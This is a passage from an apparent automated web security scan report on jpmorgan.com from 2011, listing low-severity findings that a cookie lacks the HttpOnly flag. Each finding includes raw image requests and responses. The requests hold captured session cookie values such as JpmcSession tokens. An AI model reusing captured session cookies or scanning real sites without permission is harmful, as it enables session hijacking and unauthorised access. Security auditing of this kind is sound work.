The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bkgrd_rr_generic.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:04 GMT
Server: Apache
Last-Modified: Fri, 06 Oct 2006 14:36:45 GMT
Accept-Ranges: bytes
Content-Length: 320
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....H.H.....C....................................................................C.......................................................................d...................................
...[SNIP]...

11.208. http://www.jpmorgan.com/images/bkgrd_sitemap.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/bkgrd_sitemap.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bkgrd_sitemap.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/clientlogon
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=c1pvTcxGWTNzphJy71VYBj1NTMvypGSGLFbgqlrsYYTL535L1LdT!-1750666501; s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; ACE_COOKIE=R2975777359; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:10 GMT
Server: Apache
Last-Modified: Tue, 12 Aug 2008 11:58:46 GMT
Accept-Ranges: bytes
Content-Length: 286
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..$...............!.......,......$......................H...........L..........
.....L*.... .J......j............N....................(8HXhx..........)9IYiy........ .*:JZjz........
.+;K[k{....
...[SNIP]...

11.209. http://www.jpmorgan.com/images/client_pixel.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/client_pixel.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/client_pixel.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:31 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:50:44 GMT
Accept-Ranges: bytes
Content-Length: 342
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................^....
...[SNIP]...

11.210. http://www.jpmorgan.com/images/dotted_line.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/dotted_line.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dotted_line.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:27 GMT
Server: Apache
Last-Modified: Thu, 07 Aug 2008 20:48:02 GMT
Accept-Ranges: bytes
Content-Length: 1129
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

11.211. http://www.jpmorgan.com/images/email_grey.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/email_grey.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/email_grey.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:05 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 21:02:47 GMT
Accept-Ranges: bytes
Content-Length: 327
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.....0..................................tqq......nkk......_\\......qonjgg...ussurr|yy......ebc...|xx...khi.............mjj.......~~|z{...lii...hhh..............................................
...[SNIP]...

11.212. http://www.jpmorgan.com/images/footer_pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/footer_pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer_pixel.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:59 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 21:47:12 GMT
Accept-Ranges: bytes
Content-Length: 263
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..'...............................................................................................................................................................................................
...[SNIP]...

11.213. http://www.jpmorgan.com/images/headers/hdr_client_logon_2008.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/headers/hdr_client_logon_2008.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headers/hdr_client_logon_2008.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:31 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
Accept-Ranges: bytes
Content-Length: 1352
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................
.T..
...[SNIP]...

11.214. http://www.jpmorgan.com/images/headers/hdr_news.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/headers/hdr_news.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headers/hdr_news.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:32 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
Accept-Ranges: bytes
Content-Length: 2507
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

..................................................................
...[SNIP]...

11.215. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_corporations.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/2008_flash/img/home_corporations.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_corporations.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:29 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
Accept-Ranges: bytes
Content-Length: 6424
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ............................................................x.."..............................
...[SNIP]...

11.216. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_fininst.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/2008_flash/img/home_fininst.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_fininst.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:29 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
Accept-Ranges: bytes
Content-Length: 8890
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ............................................................w.."..............................
...[SNIP]...

11.217. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_individuals.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/2008_flash/img/home_individuals.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_individuals.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:30 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
Accept-Ranges: bytes
Content-Length: 6684
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ............................................................x.."..............................
...[SNIP]...

11.218. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_publicsector.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/2008_flash/img/home_publicsector.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_publicsector.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:30 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
Accept-Ranges: bytes
Content-Length: 6716
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ............................................................w.."..............................
...[SNIP]...

11.219. http://www.jpmorgan.com/images/homepage/2008_flash/img/home_smallbus.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/2008_flash/img/home_smallbus.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/2008_flash/img/home_smallbus.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:30 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT
Accept-Ranges: bytes
Content-Length: 8602
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ............................................................w.."..............................
...[SNIP]...

11.220. http://www.jpmorgan.com/images/homepage/shadow_bt_820.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/shadow_bt_820.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/shadow_bt_820.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:27 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:03:40 GMT
Accept-Ranges: bytes
Content-Length: 1243
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR...4.../.....5.......tEXtSoftware.Adobe ImageReadyq.e<...}IDATx...mn.6..a.v..k.*.W...
.ch..l.k....}9*..zA.............p.^.-....4M!....|........j..s...t
1.4._...|.cK..v......K.?......v*
...[SNIP]...

11.221. http://www.jpmorgan.com/images/homepage/shadow_lt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/shadow_lt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/shadow_lt.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:27 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:04:04 GMT
Accept-Ranges: bytes
Content-Length: 1536
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png

.PNG
.
...IHDR.../..........wJ.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...a..:..%;..;.\u*..d.YBl.e.$..TQ.1.......*.7.?..y.......~]W.uu..O..z?.......}......._.l......9.........R........_..v.p-.
...[SNIP]...

11.222. http://www.jpmorgan.com/images/homepage/shadow_rt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/homepage/shadow_rt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepage/shadow_rt.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
